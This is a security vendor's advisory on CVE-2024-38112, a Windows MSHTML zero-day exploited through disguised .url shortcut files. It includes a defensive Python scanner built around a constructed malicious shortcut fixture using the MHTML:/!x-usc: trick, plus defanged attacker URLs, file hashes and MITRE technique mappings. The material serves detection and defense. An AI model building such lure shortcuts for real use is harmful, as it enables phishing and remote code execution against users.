overview

As part of Microsoft’s Patch Tuesday release, the company shipped a critical patch for CVE-2024-38112, a spoofing vulnerability in the Windows MSHTML Platform that attackers have been actively exploiting for over a year. The zero-day has been in use since January 2023 and was detected as recently as May 2024.

CVE-2024-38112 affects the Windows MSHTML Platform and is exploited through malicious Windows Internet Shortcut files (.url) that abuse the retired Internet Explorer (IE) browser engine, allowing attackers to execute remote code on Windows 10/11 systems.

Attackers disguise these shortcut files with customized icons so that they appear benign, deceiving users into opening them. Because the embedded link invokes the MHTML: URI handler, the file forces the retired IE engine, rather than the user's default browser, to open an attacker-controlled website, which leads to remote code execution.
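The mechanism described above can be checked for directly in the .url files themselves. The following is an added defender-side example, not code from Avertium or Microsoft: it parses the INI-style Internet Shortcut format and flags entries whose URL= value uses the MHTML: scheme or carries the !x-usc: token that appears in the IoCs below. The two fixtures and the placeholder hostname are constructed for this example.

```python
import re
from typing import Dict, List

# Constructed fixture (not a captured sample; hostname is a placeholder): an
# Internet Shortcut whose URL= entry goes through the MHTML: handler with the
# !x-usc: suffix, so the target opens in the legacy IE/MSHTML engine instead of
# the default browser, while a custom icon makes the file look like a document.
SAMPLE_MALICIOUS = """[InternetShortcut]
URL=mhtml:http://placeholder.invalid/te/test1.html!x-usc:http://placeholder.invalid/te/test1.html
IconFile=C:\\Users\\Public\\report.pdf.ico
ShowCommand=7
"""

# Constructed fixture: an ordinary shortcut that must not be flagged.
SAMPLE_BENIGN = "[InternetShortcut]\nURL=https://www.example.com/\n"

MHTML_SCHEME = re.compile(r"^\s*mhtml:", re.IGNORECASE)
X_USC_TOKEN = re.compile(r"!x-usc:", re.IGNORECASE)


def parse_url_file(text: str) -> Dict[str, str]:
    """Return the [InternetShortcut] key/value pairs, keys lowercased (INI-style)."""
    section, values = "", {}
    for raw in text.lstrip("\ufeff").splitlines():      # tolerate a UTF-8 BOM
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line[0] == "[" and line[-1] == "]":
            section = line[1:-1].lower()
        elif section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def scan_url_file(text: str) -> List[str]:
    """Return findings for one .url file; an empty list means nothing suspicious."""
    values = parse_url_file(text)
    target = values.get("url", "")
    findings = []
    if MHTML_SCHEME.match(target):
        findings.append("URL uses the MHTML: scheme (routed to the legacy IE/MSHTML engine)")
    if X_USC_TOKEN.search(target):
        findings.append("URL carries the !x-usc: token seen in the listed IoCs")
    if findings and "iconfile" in values:
        # Surface the custom icon: it is what disguises the shortcut for the user.
        findings.append("custom icon: " + values["iconfile"])
    return findings
```

Run `scan_url_file` over the contents of each .url file found in mail attachments or download folders; any non-empty result is worth a closer look, and the custom icon path gives the analyst context on how the file was disguised.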

To prevent exploitation, administrators should apply Microsoft’s patch as soon as possible. 

avertium's recommendations

  • Administrators must apply the patch released by Microsoft to prevent URL files from triggering the MHTML: URI handler. See Microsoft’s advisory for guidance.  
  • Users should be cautious when opening URL files from unknown sources and heed OS security warnings. 

how avertium is protecting our customers

IOCs ADDED TO OUR THREAT FEEDS

NOTE!: Avertium is actively searching across all monitored environments for the IoCs listed below. If any are discovered, we will reach out to you directly. If your environment or portions of your environment are not currently being monitored, please reach out to your Service Delivery Manager.

SHA-256

22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c 
65142c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94 
bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0 

URL 

hxxp://cbmelipilla[.]cl/te/test1[.]html 

hxxp://cbmelipilla[.]cl/te/test1[.]html!x-usc:http://cbmelipilla.cl/te/test1[.]html 

hxxps://cbmelipilla[.]cl/te/Books_A0UJKO[.]pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80[.]hta 

Domain 

Cbmelipilla[.]cl 

TTPs TO MONITOR

  1. Initial Access (Tactic ID: TA0001)
  • Phishing: Spear Phishing Attachment (ID: T1566.001): The attacker sends an email with a malicious attachment that exploits the MSHTML vulnerability.
  • Phishing: Spear Phishing Link (ID: T1566.002): The attacker directs the user to a malicious website designed to exploit the vulnerability via a link in a phishing email or message.
  2. Execution (Tactic ID: TA0002)
  • User Execution: Malicious File (ID: T1204.002): The attacker convinces the user to open a malicious file that exploits the vulnerability.
  • User Execution: Malicious Link (ID: T1204.001): The attacker gets the user to click on a malicious link, leading to the execution of exploit code.
  3. Exfiltration (Tactic ID: TA0010)
  • Exfiltration Over C2 Channel (ID: T1041): Sending collected data back to the attacker's server.
  • Exfiltration Over Web Service (ID: T1567): Using web services (like cloud storage) to exfiltrate data.

ADDITIONAL SERVICE OFFERINGS

  • Fusion MXDR is the first MDR offering that fuses together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity – one that is greater than the sum of its parts.
  • Minimizing the impact of a successful ransomware or malware attack requires detecting it as early in the attack as possible. A Security Information and Event Management (SIEM) system can help an organization accomplish this. Avertium offers a comprehensive SIEM-based approach that increases the potential for detecting a ransomware infection before it deploys. SIEM provides a holistic overview of a company’s IT environment from a single point of view in terms of its specific security events, empowering teams to detect and analyze unusual behavior.

If you have any questions on these findings or prefer to no longer be notified about this issue, please contact the Cyber Fusion Center by replying to this message, sending an email to cfc@avertium.com, or by calling 1-877-707-7997 (option 1).

SUPPORTING DOCUMENTATION

Attackers Already Exploiting Flaws in Microsoft's July Security Update (darkreading.com) 

Zero-day patched by Microsoft has been exploited by attackers for over a year (CVE-2024-38112) - Help Net Security 

CVE-2024-38112 - Security Update Guide - Microsoft - Windows MSHTML Platform Spoofing Vulnerability 
